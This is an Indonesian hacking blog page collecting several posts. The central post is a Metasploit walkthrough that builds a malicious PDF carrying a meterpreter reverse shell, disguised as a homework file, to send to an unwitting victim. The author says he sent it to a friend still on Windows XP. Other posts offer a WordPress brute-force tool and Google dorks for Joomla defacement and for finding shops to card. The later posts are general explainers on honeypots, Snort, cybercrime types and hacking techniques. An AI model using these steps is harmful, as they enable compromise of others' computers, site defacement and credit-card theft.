Latest Posts

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Assalamualaikum Wr Wb
Bagi para pengguna LINUX terutama ubuntu yang sangat ingin sekali mempunya aplikasi backtrack di dalamnya ,hari ini saya akan berikan tutorialnya, oke langsung aja ,


pertama download dulu backtrack.gpg

Kemudian import key dengan cara buka synaptic kemudian pilih menu Settings -> Repositories, kemudian pada jendela Software Sources pilih tab Authentication dan klik tombol Import Key File yang berada di pojok kiri bawah. Pilih file .gpg yang telah Anda download tadi kemudian close.

Atau bisa juga menambahkan gpg melalui terminal dengan menjalankan perintah di bawah ini:

  • sudo wget @http"://all.repository.backtrack-linux.org/backtrack.gpg
  • sudo apt-key add backtrack.gpg

Kedua, tambahkan source Backtrack dengan menjalankan perintah di bawah ini pada terminal:

  • sudo gedit /etc/apt/sources.list
Repository dari official resmi
  • deb @http"://all.repository.backtrack-linux.org revolution main microverse non-free testing
  • deb @http"://32.repository.backtrack-linux.org revolution main microverse non-free testing
  • deb @http"://source.repository.backtrack-linux.org revolution main microverse non-free testing
Repository dari IDWS
  • deb @http"://backtrack.indowebster.com/repo/all revolution main microverse non-free testing
  • deb @http"://backtrack.indowebster.com/repo/32 revolution main microverse non-free testing
  • deb @http"://backtrack.indowebster.com/repo/source revolution main microverse non-free testing




Level : Medium, Hard

Testing : Win XP SP3, Windows 7

Vulnerable Application Testing : Adobe Reader 9.1

Requirement :

1. Metasploit Framework

2. Windows or Linux OS(I'm using Kali Linux in this tutorial)


Berikut ini tahap-tahapannya :

Buka terminal anda dan ketikan ini:


Code:
  • service postgresql start
    service metasploit start
    msfconsole




 setelah terbuka metasploit anda ketikan ini:


Code:
  • use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
    set payload windows/meterpreter/reverse_tcp
    set filename tugas.pdf
    set lhost 192.168.1.100
    set lport 443
    exploit

Keterangan:
use exploit Use adobe pdf embedded exe exploit
set payload window set the payload to return meterpreter script when exploit successfully performed
set filename tugas.pdf --> Membuat file ini semenarik Anda sehingga korban akan membuka PDF berbahaya Anda.
set lhost 192.168.1.100 --> Ip Anda
set lport 443 --> Saya menggunakan port ini (443 selalu terbuka: p)
exploit --> menghasilkan PDF berbahaya


 Setelah berhasil menghasilkan PDF, itu akan disimpan di komputer lokal Anda buka folder home CTRL+H /root/.msf4/local/(nama pdf)
Langkah selanjutnya adalah mengirimkan pdf kita untuk menargetkan ke korban, terserah mau pakai teknik apa jg bro yang penting file pdf sampai dikomputer korban. Dalam hal ini saya akan kirimkan ke teman saya ma*******@gmail.com kebetulan teman ane masih pakai wedus XP.

setelah file kita berada di pc korban tinggal ketikan ini di terminal:


Code:
  • use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lport 443
    set lhost 192.168.1.100 (ip anda)
    exploit

 SOURCE: indonesianbacktrack.or.id


Kali ini saya akan membagikan tools Brute Force , keunggulan  tools ini adalah :
  • Auto scan admin use
  • Auto scan plugins
  • Penggunaan mudah
 Cara pemakaian :

buka terminal lalu ketikan

  • wpbf.py http://domain.com

tanpa scan plugins

  • wpbf.py http://domain.com --nopluginscan


Download Toolsnya  :  | DISINI |



Untuk kamu yang punya rasa ingin tahu tinggi dan memiliki jiwa hacker, Mungkin tips ini akan menarik perhatian kamu sehingga kamu bisa membaca artikel ini. Ya, Mengetahui IP Address Komputer Orang Lain adalah salah satu dasar untuk menjadi Hacker sungguhan, terlepas bagaimana caranya. Buat yang belum tau apa itu IP Address, Silahkan baca disini.
Caranya cukup mudah, dengan menggunakan Tools yang bernama Free IP Scanner. Dengan software ini kamu bisa mencari IP orang lain secara mudah, dan memanfaatkannya untuk keperluan tertentu. Hehe
  • Download dan Install Free IP Scanner di Komputer kamu
  • Jalankan Free IP Scanner, Jika diminta masukan License Key, Klik SKIP saja
  • Lalu masukan Range IP-nya, yaitu jarak IP pertama ke IP kedua, lalu klik "Start Scanning"

  • Dari gambar diatas, ada IP yang bertanda "Centang" dan bertanda "Silang". Untuk IP yang bertanda "Centang" menandakan IP tersebut Ada dan Sedang Aktif digunakan.
  • Silahkan gunakan Informasi diatas sesuai dengan keperluan kamu, Asal jangan usil yah :)
  • Sekiiaann semoga bermanfaatt ....


Berikut ini adalah sedikit tips tentang Cara Membuat Tampilan CMD (command prompt) Transparan Seperti Terminal Pada Linux

Langsung saja ke cara pembuatannya

- Download dulu aplikasi  : Klik Disini

- Jika selesai lakukan ekstrak file kemudian rename file yang bernama console.exe menjadi cmd2.exe

- Selanjutnya copy semua isi file dalam folder console2 kemudian paste pada C:/windows/system32
 (hal ini bertujuan untuk mempermudah pemanggilan aplikasi pada menu run seperti halnya pada saat pemanggilan perintah cmd bawaan windows)

- Untuk mengujicoba pemanggilan aplikasi tekan tombol kombinasi Windows + R atau masuk ke menu RUN kemudian ketik cmd2

- Setelah layar cmd2 tampil, lakukan pengaturan dengan cara klik pada menu view-edit-setting kemudian masuk pada tab appearance-more, pada layar sebelah kanan berikan centang pada Windows transparency dan pilih alpha,

- kemudian atur active windows sesuai keinginan anda.

Sumber Artikel: http://gca-team.blogspot.com/2014/04/mengubah-cmd-windows-mirip-linux.html#ixzz3JIvUUTLG



      Berikut ini adalah Dork mengenai deface dengan tekhnik COM_USER dan Dork Carding

Com_user :
  • inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/compon­ents/users-component/registration-form site:br
  • inurl:Home Page Beez joomla 1.6 index.php using-joomla
  • inurl:index.php joomla! 1.7 - open source content management 
  • inurl:index.php/using-joomla/extension/c­omponents/content-component/article-cate­gory-list/50-upgraders site:com
  • intext:joomla! 1.7 - open source content management site:jp
  • inurl:index.php/using-joomla/extensions/­templates/beez-2/home-page-beez-2 site:as
  • inurl:index.php/19-sample-data-articles/­joomla/50-upgraders site:.com
  • inurl:index.php/19-sample-data-articles/­joomla site:com


Carding : 
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"
inurl:".php?catid=
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?orderid=" intext:"add to cart"
inurl:".php?orderid=" intext:"Buy Now"
inurl:".php?orderid=" intext:"shopping"

Sumber Artikel: http://gca-team.blogspot.com/2014/01/kumpulan-dork-comuser-dan-dork-carding.html#ixzz3JIxAxEkn


Honeypot merupakan sebuah sistem atau komputer yang sengaja dijadikan umpan untuk menjadi target serangan dari penyerang (attacker). Komputer tersebut melayani serangan yang dilakukan oleh attacker dalam melakukan penetrasi terhadap server tersebut. Honeypot akan memberikan data palsu apabila ada hal aneh yang yang akan masuk ke dalam sistem atau server. Secara teori Honeypot tidak akan mencatat trafik yang legal. Sehingga dapat dilihat bahwa yang berinteraksi dengan Honeypot adalah user yang menggunakan sumber daya sistem yang digunakan secara ilegal. Jadi Honeypot seolah-olah menjadi sistem yang berhasil disusupi oleh attacker, padahal penyerang tidak masuk ke sistem sebenarnya, tetapi masuk ke sistem yang palsu.
Salah satu software Honeypot yang terkenal dan banyak dipakai adalah Honeyd. Ia akan menjebak attacker dengan membuat server-server palsu dengan bermacam-macam jenis sistem operasi seperti Windows, Linux, Unix, Mac Os dan bahkan cisco router dengan berbagi layanan seperti FTP, Web, Server dan sebagainya. Salah satu kelebihan Honeyd adalah mengemulasikan banyak server dan layanan servis palsu hanya pada satu unit komputer atau server sehingga akan menghemat resource.
Sistem keamanan firewall tidaklah cukup untuk meminimalkan terjadinya serangan terhadap suatu jaringan komputer. Banyak serangan yang terjadi pada jaringan komputer dapat diketahui setelah adanya kejadian-kejadian yang aneh pada jaringan. Para administrator tidak bisa mengetahui dengan pasti apa yang terjadi, sehingga dibutuhkan waktu yang cukup lama untuk mengaudit sistem guna mencari permasalahan yang telah terjadi.
Untuk mengatasi masalah tersebut dibutuhkan suatu tool yang mampu mendeteksi lebih awal terjadinya intruder atau kegiatan yang merugikan suatu jaringan. Intrussion Detection System merupakan suatu solusi yang sangat tepat untuk keperluan tersebut.
Salah satu IDS (Intrusion Detection System) yang sangat populer dalam keamanan IT adalah Snort. Snort dibuat dan dikembangkan pertama kali oleh Martin Roesh pada bulan November 1998, lalu menjadi sebuah Open Source project. Bahkan di situs resminya www.snort.org mereka berani mengklaim sebagai standar "intrussion detection/prevention". Snort merupakan IDS yang sangat populer dan cukup ampuh.
Definisi dari L. Spitzner tentang istilah Honeypot adalaha sebagai berikut:
“A Honeypot is a resource whose value is being in attacked or compromised. This means, that a Honeypot is expected to get probed, attacked and potentially exploited. Honeypots do not fix anything. They provide us with additional, valuable information.”
Definisi lain menurut Retto Baumann dan Cristian Plattner :
“A Honeypot is a resource which pretends to be a real target. A Honeypot is expected to be attacked or compromised. The main goals are the distraction of an attacker and the gain of information about an attack and the attacker.”
A. Kategori Honeypot
Menurut kategorinya Honeypot terdiri atas :
1). Production Honeypot
2). Research Honeypot
Production Honeypot digunakan untuk mengurangi resiko serangan pada sistem keamanan jaringan informasi dalam sebuah organisasi. Research Honeypot digunakan untuk mendapatkan infrmasi sebanyak mungkin tentang penyerang sehingga seorang adimnistrator dapat mempelajari sebanyak mungkin informasi tersebut
B. Jenis Honeypot
Jenis Honeypot adalah berdasarkan level of involvement (tingkat keterlibatan). Level of involvement mengukur derajat interaksi seorang penyerang dengan sistem informasi. Terdiri dari dua jenis yakni low involvement Honeypot dan high involvement Honeypot.
1). Low Involvement Honeypot
Low Involvement Honeypot biasanya hanya menyediakan tiruan dari layanan tertentu. Bentuk paling sederhana dari layanan ini dapat diimplementasikan dengan memasang suatu listener pada sebuah port. Sebagai contoh, simple netcat –l –p 80 > /log/Honeypot/port 80.log dapat digunakan untuk mendengarkan port 80 (HTTP) dan mencatat semua traffic yang ada pada log file. Pada Low Involvement Honeypot tidak ada sistem operasi nyata yang dapat dipakai sebagai tempat operasi penyerang. Ini akan dapat mengurangi resiko secara signifikan karena kompleksitas dari suatu sistem operasi telah ditiadakan. Di sisi lain ini adalah juga suatu kelemahan yang berakibat tidak adanya kemungkinan untuk memperhatikan interaksi penyerang dengan sistem operasi yang bisa jadi sangat menarik. Low Involvement Honeypot adalah seperti sebuah koneksi satu arah. Kita hanya akan dapat mendengarkan tanpa bisa menanyakan pertanyaan sendiri. Pendekatan cara ini sangat pasif.
2). High Involvement Honeypot
High involvement Honeypot mempunyai sebuah sistem operasi nyata yang mendasarinya. Hal ini menyebabkan resiko yang sangat tinggi karena kompleksitas menjadi semakin bertambah. Pada saat yang sama, kemampuan untuk mengumpulkan 10 informasi, dan kemungkinan untuk serangan yang lebih atraktif juga semakin bertambah banyak. Satu tujuan dari seorang hacker adalah menambah sumber dan mendapatkan akses pada satu mesin yang terhubung ke internet selama 24 jam sehari. High involvement Honeypots menawarkan kemungkinan itu. Ketika seorang hacker mendapatkan akses, bagian yang sangat menarik dimulai. Sayangnya seorang penyerang akan berkompromi dengan sistem untuk mendapatkan level kebebasan seperti ini. Dia akan mempunyai sumber yang sebenarnya pada sistem dan dapat melakukan apa saja pada setiap saat dalam sistem yang berkompromi tersebut. Oleh sebab itu sistem tidak lagi aman. Bahkan seluruh mesin tidak lagi dapat dikatakan aman. Hal ini tidak akan menjadi masalah jika penyerang berada pada sebuah jail, sandbox, atau VMWare box karena akan ada jalan untuk keluar dari batas-batas software ini.


Anonymous adalah kelompok Aktivis atau "Hacktivis" yang dibentuk pada tahun 2003. Para anggotanya dapat dibedakan di depan publik dengan mengenakan topeng Guy Fawkes  atau yang biasa dikenal V for Vendetta. Pada tahun 2011, Majalah Timememasukkan nama "Anonymous" sebagai salah satu orang paling berpengaruh di dunia.

Perkembangan teknologi dunia komputer saat ini semakin meningkat pesat. Melalui konektivitas jaringan Internet, komputer dapat berfungsi sebagai media penyedia informasi dan sebagai alat untuk kegiatan komersial yang pesat pertumbuhannya serta menembus berbagai batas negara. Bahkan melalui jaringan internet pula kita dapat mengetahui kegiatan pasar uang di dunia selama 24 jam.

Hampir semua hal dapat dilakukan melalui dunia internet atau yang lebih sering disebut “Cyberspace”. Penggunaan teknologi internet ini dapat dinilai dari dua sudut pandang yang berbeda. Dari sudut pandang positif, pengguna dapat memperoleh kemudahan dalam menganalisa, mengirimkan, dan saling bertukar informasi digital dengan pengguna lainnya yang letaknya berjauhan.

Namun seiring dengan perkembangan teknologi Cyberspace, menyebabkan munculnya peluang-peluang baru bagi mereka yang tidak bertanggung jawab untuk melakukan berbagai tindakan kejahatan di dunia internet, atau yang dikenal dengan sebutan “Cybercrime”. Cybercrime sendiri didefinisikan oleh Tavani (2000) sebagai kejahatan dimana tindakan kriminal tersebut hanya bisa dilakukan dengan menggunakan teknologi Cyber dan terjadi di dunia Cyber.

Kegiatan Cybercrime ini biasanya dilakukan oleh orang yang disebut Cracker. Cracker merupakan istilah untuk orang-orang yang sering mengganggu sistem. Bisa dibilang, Cracker adalah Hacker yang melakukan kegiatan negatif. Orang-orang inilah yang umumnya sering melakukan kejahatan. Dan Cyber Crime yang dilakukan para Cracker ini dapat digolongkan menjadi beberapa aktivitas. Aktivitas tersebut terbagi ke dalam beberapa poin berikut.

Unauthorized Access


Kejahatan Cybercrime yang terjadi ketika seseorang memasuki atau menyusup ke dalam suatu sistem jaringan komputer secara tidak sah, tanpa izin, atau tanpa sepengetahuan dari pemilik sistem jaringan komputer yang dimasukinya. Probing dan port merupakan contoh kejahatan ini.




Illegal Contents


Kejahatan Cybercrime dengan memasukkan data atau informasi ke internet tentang suatu hal yang tidak benar, tidak etis, dan dapat dianggap melanggar hukum atau menggangu ketertiban umum, contohnya adalah penyebaran pornografi




Penyebaran virus secara sengaja


Serangan dengan virus komputer ini umumnya dilakukan dengan penyebaran melalui e-mail. Sering kali orang yang sistem e-mailnya terkena virus tidak menyadari hal ini. Virus ini kemudian dikirimkan ke tempat lain melalui e-mailnya




Cyberstalking


Kejahatan jenis ini dilakukan untuk mengganggu atau melecehkan seseorang dengan memanfaatkan komputer, misalnya menggunakan e-mail dan dilakukan berulang-ulang. Kejahatan tersebut menyerupai teror yang ditujukan kepada seseorang dengan memanfaatkan media internet. Hal itu bisa terjadi karena kemudahan dalam membuat e-mail dengan alamat tertentu tanpa harus menyertakan identitas diri yang sebenarnya.



sekian duluu ya infonya, semoga bermanfaatt




Hacking :

Adalah kegiatan memasuki system melalui system Operasional yg lain, yg dijalankan oleh Hacker.
Ada berbagai macam system, misalnya Web, Server, Networking, Software dan lain-lain, atau juga kombinasi dari beberapa system tersebut, tujuanya dari seorang Hacking adalah untuk mencari hole atau bugs pada system yg dimasuki, dalam arti untuk mencari titik keamanan system tersebut. Bila seorang Hacking berhasil masuk pada system itu, maka Hacking tidak merusak data yg ada, melainkan akan memperluas kegiatannya di system itu untuk menemukan hal yg lain. Setelah itu akan memberitahukan kepada pembuat / pemilik dari system, bahwa system yang dimiliki mempunyai bugs, hole, scratch dan lain-lain. Ini biasanya bersifat legal.

Cracking:

Prinsipnya sama dengan Hacking, namun tujuannya cenderung tidak baik. Pada umumnya Cracker mempunyai kebiasaan merusak, mengambil data dan informasi penting dan hal-hal lainnya yg tidak baik. Ringkas kata, kebalikannya dari Hacker. ini bersifat ilegal.

Hijacking:

Ini juga berprinsip sama dengan Cracking, akan tetapi hijacker kebanyakan menggunakan alat bantu, Software untuk merusak. Tujuannya juga sangat tidak baik selain mengambil data, informasi, sabotase, juga mengambil alih system yg di tujunya. Setelah merusak system tersebut.

Carding:

Sama halnya dengan Cracking & Hijacking. Carder mencari dan mencuri data account (Credit Card, pada umumnya) yg ada di system untuk di pakai sendiri / bersama teamnya, dan dalam operasinya biasanya dengan menggunakan alat bantu maupun tidak.

1. Teknik Session Hijacking Dengan session hijacking, hacker jahat menempatkan sistem monitoring/ spying terhadap pengetikan yang dilakukan pengguna pada komputer yang digunakan untuk mengakses internet. Untuk mengatasi masalah ini pengguna sebaiknya menggunakan komputer yang benar-benar terjamin dan tidak digunakan oleh sembarang orang, misalnya komputer di rumah, kantor, dsb.

2. Teknik Packet Sniffing Pada teknik ini, hacker jahat mengintai atau menangkap paket data yang ditransmisikan dari komputer client ke web server pada jaringan internet. Untuk mengatasi masalah ini perlu dilakukan enkripsi/ penyandian paket data pada komputer client sebelum dikirimkan melalui media internet ke web server.

3. Teknik DNS Spoofing Pada teknik ini hacker berusaha membuat pengguna mengunjungi situs yang salah sehingga memberikan informasi rahasia kepada pihak yang tidak berhak. Untuk melakukan tehnik ini hacker umumnya membuat situs yang mirip namanya dengan nama server eCommerce asli. Misalnya www.klikbca.com merupakan situs yang asli, maka hacker akan membuat situs bernamawww.klik_bca.com, www.klikbca.org, www.klik-bca.com,www.klikbca.co.id. Dengan demikian ketika pengguna membuka alamat yang salah, ia akan tetap menduga ia mengunjungsi situs klikbca yang benar. Untuk mengatasi masalah tersebut di atas dapat dipecahkan dengan melengkapi Digital Certificates pada situs asli. Dengan demikian meskipun hacker dapat membuat nama yang sama namun tidak bisa melakukan pemalsuan digital certificate. Pengguna atau pengunjung situs dapat mengetahui bahwa situs itu asli atau tidak dengan melihat ada tidaknya certificate pada situs tersebut menggunakan browser mereka. Disamping itu webserver eCommerce harus dilengkapi dengan firewall yang akan menyaring paket-paket data yang masuk sehingga terhindar dari serangan Denial Of Service (DoS).

4. Teknik Website Defacing Pada teknik ini, hacker jahat melakukan serangan pada situs asli misalkan www.klikbca.com kemudian mengganti isi halaman pada server tersebut dengan miliknya. Dengan demikian pengunjung akan mengunjungi alamat dan server yang benar namun halaman yang dibuat hacker jahat. Untuk mengatasi masalah di atas server eCommerce perlu dikonfigurasi dengan baik agar tidak memiliki celah keamanan dan juga harus dilengkapi firewall yang akan menyaring paket data yang dapat masuk ke situs tersebut.

Oke itu adalah beberapa teknik hacking selamat belajar...